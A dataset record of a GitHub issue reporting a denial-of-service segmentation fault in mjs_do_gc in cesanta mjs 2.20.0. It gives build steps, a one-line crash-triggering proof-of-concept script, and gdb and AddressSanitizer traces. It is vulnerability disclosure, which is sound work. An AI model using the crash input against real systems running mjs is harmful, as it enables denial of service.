signal is caused by a READ memory access. ==1337961==Hint: address points to the zero page. #0 0x55555557bad9 in mjs_do_gc /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:7360 #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824 #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044 #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067 #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406 #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308 #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:7360 in mjs_do_gc ==1337961==ABORTING ```
Segmentation fault on mjs_do_gc
https://api.github.com/repos/cesanta/mjs/issues/286/comments
0
2024-05-09T09:20:18Z
2024-05-09T09:29:41Z
https://github.com/cesanta/mjs/issues/286
2,287,269,819
286
[ -0.012912939302623272, -0.00010665193985914811, -0.00023295480059459805, 0.02336905710399151, 0.029364872723817825, 0.034687984734773636, -0.024187996983528137, 0.03977711871266365, -0.02386626973748207, 0.008452637121081352, -0.015516000799834728, 0.00017274529091082513, 0.00622614240273833...
1,141
This is a GitHub Issue repo:mjs owner:cesanta Title : Segmentation fault on mjs_do_gc Issue date: --- start body --- **The name of an affected Product** [mjs](https://github.com/cesanta/mjs) **The affected version** Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) (Tag: [2.20.0](https://github.com/cesanta/mjs/releases/tag/2.20.0)) **Description** An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_do_gc function in the mjs.c file. **Vulnerability Type** Segmentation fault **Environment** - Operating System Ubuntu 20.04 - Steps to Reproduce ``` git clone https://github.com/cesanta/mjs cd mjs git checkout b1b6eac gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan ``` <details> <summary>poc</summary> <!-- summary 아래 한칸 공백 두어야함 --> ` gc(3+gc)(gc )` </details> **run command** `./mjs-asan -f poc` **gdb info** ``` Program received signal SIGSEGV, Segmentation fault. 0x000055555557bada in mjs_do_gc (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:7360 7360 static void mjs_do_gc(struct mjs *mjs) { --Type <RET> for more, q to quit, c to continue without paging-- #0 0x000055555557bada in mjs_do_gc (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:7360 #1 0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824 #2 0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_1", src=0x602000000050 " gc(3+gc)(gc )", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044 #3 0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_1", res=0x7fffffffdb80) at mjs.c:9067 #4 0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406 ``` **address sanitizer info** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1337961==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557bada bp 0x7fffffffda10 sp 0x7fffffffd708 T0) ==1337961==The signal is caused by a READ memory access. ==1337961==Hint: address points to the zero page. #0 0x55555557bad9 in mjs_do_gc /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:7360 #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824 #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044 #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067 #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406 #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308 #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:7360 in mjs_do_gc ==1337961==ABORTING ``` --- end body --- comments : --- start comments --- --- end comments ---
3,163